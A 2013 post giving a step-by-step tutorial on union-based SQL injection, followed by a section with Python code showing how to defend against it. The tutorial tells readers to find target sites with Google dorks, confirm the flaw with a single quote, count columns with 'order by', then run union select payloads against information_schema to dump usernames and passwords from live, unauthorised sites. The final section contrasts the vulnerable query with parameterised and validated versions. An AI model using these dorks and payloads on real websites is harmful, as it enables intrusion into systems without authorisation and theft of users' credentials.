29 May 2013
SQL Injection how to
Injection Tutorial
Step 1. Search Google by typing in a dork and clicking one of the websites that show up.
Common Dorks
inurl:members.php?id=
inurl:page.php?id=
inurl:login.php?id=
inurl:index.php?id=
inurl:register.php?id=
inurl:staff.php?id=
inurl:detail.php?id=
inurl:view.php?id=
Step 2. Once you have found a site, it's time that we check if it is vulnerable to a SQL Injection.
So let's say we have a site like this
http://www.site.com/index.php?id=1
What we do is put a ' (single quote) after the number in order to get an error to show up on the page.
http://www.site.com/index.php?id=1'
You should get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near line 1" or something.
Step 3. After getting the error, we know it's vulnerable to SQL Injection. Now we have to find out how many columns it has.
We use the "order by" function to do this.
http://www.site.com/index.php?id=1 order by 10
Now, I suggest you go by 10's. If you did order by a number and it shows an error, that means you need to use a lower number.
We are looking for a number that gives no error where the number right after it gives an error.
So let's say we did:
order by 10 (error)
order by 7 (no error)
order by 8 (no error)
order by 9 (error)
What this means is that there are 8 columns.
Step 4. Now that we have the number of columns, it's time to figure out which column is vulnerable so that we can extract
data from it. We can do this by putting a "-" minus sign after the = equals sign in the url and by using the union select
function. After union select, write every number that leads to the number of columns, separated by a comma.
So here's how it should look:
http://www.site.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8
After you do this, you should get one or more of the column numbers showing up on screen.
Step 5. Let's say a number 2 popped up on the screen. That means that column number 2 is vulnerable. Now we need to get the
version of the database. We do this by using the @@version function.
http://www.site.com/index.php?id=-1 union select 1,@@version,3,4,5,6,7,8
Replace the number 2 in the url with @@version to get the version number to show up on your screen. Now the numbers that show
up should either be 5.(some numbers) or 4.(some numbers).
For SQL Version 5 Injection:
Step 1. Now that we have the version number, it's time to get the name of the tables within the database. We use the
group_concat(table_name) function. Since it's version 5, the tables are already in 1 big table named information_schema. We
use -- to execute our command.
http://www.site.com/index.php?id=-1 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables--
Step 2. On the screen, a bunch of names should pop up. Those are the names of the tables. Now, what you need to look for is
anything that might look like it contains the usernames and passwords of everyone who uses the website. Some common ones
are users, admin, members, staff, user, etc.
Step 3. Once you have found something that might contain the usernames and passwords, it's time to get the name of the
columns within that table. We use the group_concat(column_name) function to achieve this. And once again, in version 5, the
columns are within information_schema.columns this time.
After information_schema.columns, you need to tell the database which table you want to extract the columns from. So after
.columns, you put where table_name=(Name of table in hex form)
Now to convert the name of the table you're extracting from into Hex form, you need to use an online converter. What I use is
Text to Hex Converter. After you have the hex, put 0x before it and copy all of the numbers/letters and paste them after the
= equals sign.
So after all that it should look like this:
http://www.site.com/index.php?id=-1 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns
where table_name=0x7573657273
The name of the columns should pop up on your screen.
Step 4. Now that you have the column names within the table name you chose, it's time to extract the data. Once again, we
will use the group_concat function.
Let's say that the column names that showed up were username,password. To extract the information, we put
group_concat(username,0x3a,password) from users-- (The table name that you chose in TEXT form, not hexed). (Note: 0x3a is the
hex form of a colon, which separates the usernames and passwords so you don't get confused.) After you've done this, your url
should look like this:
http://www.site.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password),3,4,5,6,7,8 from users--
Now the usernames of people should show up, then a colon, then the passwords of the usernames.
For SQL Version 4 Injection:
For version 4 database SQL injections, it's the same thing as version 5. The only difference is that when trying to find the
table name, you have to guess what it is. It's not already done for you like in version 5. I suggest guessing like user or
admin or members, and if that doesn't work, keep trying until you get something. After you've got the table name, just follow
the same steps for 5 afterwards.
Defend your website against SQL Injection
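As an added example (not code from the original post), here is the defect that makes Steps 2 to 4 above work, beside its fix. An in-memory SQLite table stands in for the site's MySQL backend, and the schema and rows are constructed for the demo (both assumptions).

```python
import sqlite3

# Constructed stand-in for the site's database: one table the page reads,
# one table the tutorial hopes to reach through the page's query.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
conn.executemany("INSERT INTO pages VALUES (?,?,?)",
                 [(1, "Home", "Welcome"), (2, "About", "About us")])
conn.executemany("INSERT INTO users VALUES (?,?,?)",
                 [(1, "alice", "hash1"), (2, "bob", "hash2")])


def lookup_vulnerable(page_id: str):
    """The bug the tutorial relies on: the ?id= value is pasted straight into SQL.
    A quote breaks the syntax (Step 2) and a union select echoes column numbers (Step 4)."""
    sql = "SELECT id, title, body FROM pages WHERE id=" + page_id
    return conn.execute(sql).fetchall()


def lookup_bound_only(page_id: str):
    """Fix part 1: bind the value as a parameter, so it can only ever be compared as data."""
    sql = "SELECT id, title, body FROM pages WHERE id=?"
    return conn.execute(sql, (page_id,)).fetchall()


def lookup_safe(page_id: str):
    """Fix part 2 (defense in depth): reject anything that is not an integer, then bind."""
    if not page_id.lstrip("-").isdigit():
        raise ValueError("id must be an integer")
    sql = "SELECT id, title, body FROM pages WHERE id=?"
    return conn.execute(sql, (int(page_id),)).fetchall()


def probe(fn, page_id: str):
    """Run one lookup and report its rows, or the name of the error the input caused."""
    try:
        return fn(page_id)
    except (sqlite3.Error, ValueError) as e:
        return type(e).__name__


if __name__ == "__main__":
    for value in ("1", "1'", "-1 union select 1,2,3"):
        print(repr(value), probe(lookup_vulnerable, value), probe(lookup_safe, value))
```

Run against the same inputs, the concatenating version reproduces the tutorial's error and column echo, while the bound version returns no rows and the validating version refuses the input before any SQL runs.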